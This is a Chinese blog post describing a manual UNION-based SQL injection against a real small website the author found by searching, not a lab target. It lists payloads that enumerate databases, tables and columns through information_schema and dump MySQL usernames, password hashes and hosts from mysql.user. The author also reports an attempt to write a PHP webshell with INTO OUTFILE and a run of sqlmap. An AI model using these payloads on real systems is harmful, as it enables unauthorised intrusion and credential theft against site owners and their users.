本来想找个装安全狗的站试下绕过,safe dog没找到,但随便一搜搜到一个小站有SQLi,正好借此机会复习下手工注入(新版Firefox我吐槽一下,hackbar这么好用的工具,说阉割就阉割,哎)

小站没有上WAF,用1=1、1=2就可以检测注入点,就不放截图了。

然后order by 、联合查询什么的也都是基本操作。。直接进入最关键的手工爆表好了。(已知第二列和第三列有回显,MySQL version是5.6,所以直接从information_schema中就可以方便的查询)

1、爆其他数据库;

查询语句为:xxx?id=-4 union select 1,SCHEMA_NAME,3,4,5,6,7,8 FROM information_schema.schemata

页面返回为:

2、爆其他表(数据库选择刚才爆出的mysql)

查询语句为:xxx?id=-4 union select 1,TABLE_NAME,3,4,5,6,7,8 FROM information_schema.tables WHERE TABLE_SCHEMA=0x6d7973716c


这里的0x6d7973716c是mysql的十六进制表示,如果直接写mysql字符串的话数据库是不能解析的,所以要传递16进制形式的数据库名

这里有很多表,我们只需关注user表就可以,其实其他的表也会存放一些敏感数据,比如该网站的注册会员的登录信息等等,但我们目标是服务器。

3、爆字段

查询语句为:xxx?id=-4 union select 1,COLUMN_NAME,3,4,5,6,7,8 FROM information_schema.columns WHERE TABLE_NAME=0x75736572

同理,0x75736572是user表的十六进制表示。

这里我们可能关心的是以上三列的数据,user、password、host,让我们进行最后的爆数据吧!

4、爆数据

查询语句为:xxx?id=-4 union select 1,concat_ws(0x2c,User,Password,Host),3,4,5,6,7,8 FROM mysql.user

由于我要查询的有三列数据,所以这里我用了concat_ws函数进行拼接后输出,0x2c是逗号

done,手工测试到此完成,可以说是非常非常普通的正规思路了,没有一点绕过的地方直接搞就行了。

其实这里我尝试用into outfile写php的一句话木马,但是发现没有成功,编码也不行,一直报mysql_fetch_array(): supplied argument is not a valid MySQL result resource的错误。

查了一些资料,使用mysql直接写入木马的必要条件有三:

1、root权限(排除)

2、知道网站根目录的地址(排除,从随便一个报错信息中都可以爆出物理绝对路径)

3、magic_quotes_gpc()=OFF(有可能)

4、没有write权限(有可能)

用sqlmap跑下试试,看来的确如此

大概就这些吧。

#########################

谁能告诉我为什么发布以后布局这么丑,蛋疼

转载于:https://www.cnblogs.com/co10rway/p/7979750.html

记一次MySQL手工注入相关推荐

  1. mysql 4.0手工注入_手工注入——MySQL手工注入实战和分析

    前言 今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场.话不多说,咱们直接开始. 判断注入点 通过 ' 和构造 and 1=1 和 and 1=2 查 ...

  2. mysql报错注入实战_手工注入——MySQL手工注入实战和分析

    今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场.话不多说,咱们直接开始. 第一步,判断注入点 通过 ' 和构造 and 1=1 和 and 1=2 ...

  3. SQL注入第二章节MYSQL手工注入

    SQL注入第二章节MYSQL手工注入 2.1 SQL注入之sqli-labs环境搭建 一.SQLi-Labs是什么? SQLi-Labs是一个专业的SQL注入练习平台,适用于GET和POST场景,包含 ...

  4. mysql手工注入imformation_网络安全系列之十八 MySQL基本操作(PHP注入基础)

    在之前的博文中曾介绍过如何对ASP网站进行手工注入,ASP网站大都是采用ACCESS或MSSQL数据库,因而所谓针对ASP的SQL注入其实也就是根据ACCESS或MSSQL数据库的特点来构造查询语句. ...

  5. PHP+MySQL手工注入

    1.发现注入点: 202.1.160.100/xycms/showproducts.php?id=12 and 1=1 202.1.160.100/xycms/showproducts.php?id= ...

  6. mysql 手工sql注入_【sql注入专题02】Mysql手工注入流程

    0x00 SQL注入的语句介绍 SQL注入的本质 sql注入的本质就是查询某个数据库下的某个表中的某些字段的内容,比如我们平时在数据库查询一条数据时操作. mysql> use security ...

  7. MYSQL手工注入某日本网站

    经过一天的辛苦劳动下班了,实在无聊,QQ上的基友基本都挂机睡觉了.找点乐子打发时间,看了一下2013年OWASP Top Ten Project, Injection排在第一.去了解注入,还是有必要的 ...

  8. mysql手工注入imformation_SQL 注入总结

    0x01 什么是SQL注入 sql注入就是一种通过操作输入来修改后台操作语句达到执行恶意sql语句来进行攻击的技术. 0x02 SQL注入的分类 按变量类型分 数字型 字符型 按HTTP提交方式分 G ...

  9. php手工注入语句,PHP+MySQL 手工注入语句大全

    我PHP手工太菜了, 无奈只能补下PHP MYSQL手工注射,把收集总结的资料分享下. 暴字段长度 Order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5 ...

最新文章

  1. 独家 | 关于Spark NLP学习,你需要掌握的 LightPipeline(附代码链接)
  2. java txt中文乱码,JAVA读取TXT文件 可解决中文乱码问题
  3. (笔记)电路设计(三)之0欧姆电阻、磁珠、电感的应用
  4. windows批量创建域用户
  5. Cenos 软件安装
  6. 记一次Linux修改MySQL配置不生效的问题
  7. 类和对象—对象特性—const修饰成员函数
  8. 分布式系统——网络监视系统zabbix3.4.2,以及向zabbix中添加被监视主机(一)
  9. java模拟atm 课程设计_急求,关于Java课程设计ATM创建实现
  10. at java.net.url init,java.net 基本测试
  11. easyui下datagrid列单独赋值
  12. 适合初学者入手的vue项目
  13. 两个HC05蓝牙模块相互之间的通信
  14. 关系代数 元组关系演算
  15. 加载webView使用框架AgenWeb
  16. 计算机音乐苹果手机,iPhone手机音乐如何导出电脑?
  17. 夏天CPU温度过高原因及解决办法
  18. 国内外日常上网必备,实用趣味网站合集
  19. jenkins创建流水线,基于gitlab与Jenkinsfile
  20. 许永鑫 南京理工大学计算机学院,南京理工大学计算机科学与技术学院研究生导师简介-付安民...

热门文章

  1. Exynos4412 内核移植(六)—— 设备树解析
  2. 安卓USB开发教程 二 USB Host
  3. [react] 在React中组件和元素有什么区别?
  4. [react] 在React中怎么使用字体图标?
  5. [html] html5的游戏引擎你了解多少?都有哪些比较好用的引擎呢?
  6. 工作175:数据在表格横坐标动态显示
  7. 工作114:传参控制
  8. “约见”面试官系列之常见面试题之第五十七篇之强制类型转换(建议收藏)
  9. 前端学习(1407):多人管理27代码优化
  10. 前端学习(670):分支流程控制if